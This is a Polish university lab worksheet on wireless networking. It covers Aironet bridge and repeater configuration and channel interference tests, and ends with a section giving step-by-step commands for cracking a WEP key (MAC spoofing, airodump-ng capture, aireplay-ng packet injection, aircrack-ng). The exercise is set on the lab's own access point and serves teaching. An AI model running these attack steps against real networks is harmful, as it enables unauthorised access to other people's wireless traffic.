Sieci bezprzewodowe lab. nr 2

Czas trwania:

4h

1)

Budowanie bezprzewodowego mostu

Należy informować prowadzącego zajęcia po wykonaniu każdego punktu.
Skonfigurować bezprzewodowy most według poniższego schematu

.

PC1

PC4

SSID= ”Lab1-

<nr_ podgrupy>”

10.0.0.11|27

10.0.0.12|27

AP Airnet 1200

Tryb: Non ROOT

10.0.0.1|27

Airnet 1300

Tryb: ROOT

With clients

PC3

10.0.0.13|27

10.0.0.2|27

PC2

10.0.0.10|27

Ustawić następujące parametry radiowe:

a) uwierzytelnianie - Open

b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12

c) tryb pracy mostu zgodnie ze schematem

Aby skonfigurować urządzenia należy:

• Ustawić Infrastructure SSID (Security – SSID Manager);
• Ustawić typ urządzenia – root, non root;

1. Poleceniem ping przetestować działanie sieci pomiędzy poszczególnymi hostami.

Wyświetlić listę podłączonych klientów na obu AP.

AP1200: ............................................................................................................................
AP1300: ............................................................................................................................
2. Przeprowadzić pomiar szybkości transmisji pomiędzy komputerami (wszystkie urządzenia

znajdują się w sali laboratoryjnej):

PC1-PC3

PC3-PC4

PC2-PC3

PC2-PC4

3. Dla wariantu transmisji między PC1-PC3 zbadać prędkość transmisji w zależności od

odległości między AP:

1m - ...................
10m ...................
max. odl..............

4. Co dzieje się jeżeli root i non root tracą ze sobą kontakt? Jak się zachowują interfejsy

bezprzewodowe na AP pełniących różne funkcje?

...................................................

2)

Konfigurowanie Access Pointa w trybie repeater.

Należy informować prowadzącego zajęcia po wykonaniu każdego punktu.

Skonfigurować połączenia sieciowe według poniższego schematu

.

SSID= ”Lab2-

<nr_ podgrupy>”

10.0.0.11|27

Airnet 1300

Tryb: Repeater

PC3

10.0.0. 12|27

10.0.0.2|27

PC2

10.0.0.10|27

AP Airnet 1200

Tryb: AP

10.0.0.1|24

PC4

PC1

10.0.0. 9 |27

Ustawić następujące parametry radiowe:

a) uwierzytelnianie - Open

b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12

1.

Poleceniem ping przetestować działanie sieci pomiędzy poszczególnymi hostami

(wszystkie urządzenia znajdują się w sali laboratoryjnej). Wyświetlić listę podłączonych
klientów na obu AP.
AP1200: ............................................................................................................................
............................................................................................................................
AP1300: ............................................................................................................................
............................................................................................................................
2.

Przeprowadzić pomiar szybkości transmisji pomiędzy komputerami (wszystkie

urządzenia znajdują się w sali laboratoryjnej):
PC1- PC2

PC2-PC3 lub 4

PC1-PC3 lub 4

PC3-PC4

3.

Przeprowadzić pomiar szybkości transmisji przez repeater w zależności od odległości

pomiędzy AP w wariancie połączenia PC2-PC3 lub 4.
4.

Na jaka max. odległość można odsunąć od siebie AP i repeater?

...................................................
5.

Sprawdzić działanie mechanizmu filtrowania klientów poprzez adresy MAC i IP w

zależności od miejsca ich implementacji (AP, repeater).
Wnioski: ............................................................................................................................

3)

Badanie zakłóceń kanałów na połączenia sieciowe

Skonfigurować połączenia sieciowe według poniższego schematu

.

PC1

10.0.0.11|27

AP Airnet 1200

Tryb: AP

10.0.0.1|27

Airnet 1300

Tryb: AP

PC2

10.0.0.12|27

10.0.0.2|27

SSID=”AP1_< nr_grupy >”

SSID=”AP2_<nr_grupy >”

Ustawić następujące parametry radiowe:

a) uwierzytelnianie - Open

b) numery kanału dla punktów dostępowych

- 1 punkt dostępowy ((<nr_podgrupy>-1)*5+1) mod 12

- 2 punkt dostępowy ((<nr_podgrupy>)*3+1) mod 12

Sprawdzić poleceniem ping stan połączenia sieciowego. Zmienić numer kanału drugiego
punktu dostępowego na taki sam jak na pierwszym punkcie dostępowym. Zaobserwować
wpływ zakłóceń na połączenia sieciowe.
Wnioski: ............................................................................................................................

Zbadać wzajemny wpływ innych kanałów (pośrednich)
Wnioski: ............................................................................................................................

4) Analiza sieci i ochrona informacji w sieciach bezprzewodowych -
Łamanie zabezpieczeń protokołu WEP

Przygotować środowisko według poniższego schematu.

SSID=”Lab1-

<nr_podgrupy >”

Access Point

z WEP

PC1

BackTrack 3

Ustawić następujące parametry na Aceess Poincie:

a) protokół – WEP

b) numer kanału – ((<nr_podgrupy>-1)*5+1) mod 12

c) 40 bitowy klucz

Podłączyć PC1 z Access Pointem i generować dużo ruchu sieciowego. Na BackTrack 3
wykonać próbę odzyskania klucza sieciowego wykorzystując narzędzia zawarte w systemie
Backtrack 3 uruchamianego z nośnika USB lub płyty CD.

Procedura łamania hasła protokołu WEP

1) Należy przestawić kartę bezprzewodową w tryb monitor

modprobe -r iwl3945

modprobe ipwraw

iwconfig // sprawdzenie nazwy interfejsu bezprzewodowego

airmon-ng stop [device]

i

fconfig [interface] down // device = interface

2) Zmiana adresu MAC karty sieciowej i wystartowanie karty w trybie monitor.

macchanger --mac 00:11:22:33:44:66 [device]

airmon-ng start [device]

3) Przechwytywanie pakietów wybranej sieci

airodump-ng [device] //podsłuch wszystkich sieci w zasięgu

airodump-ng -c [channel] -w [network.out] –-bssid [bssid] [device]

4) Sztuczne generowanie dużej ilości ruchu sieciowego w celu przyspieszenia procesu
łamania hasła (uruchomione w odrębnych shellach)

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66
[device]

5) Próba łamania hasła

aircrack-ng -n 64 -b [bssid] [filename]-01.cap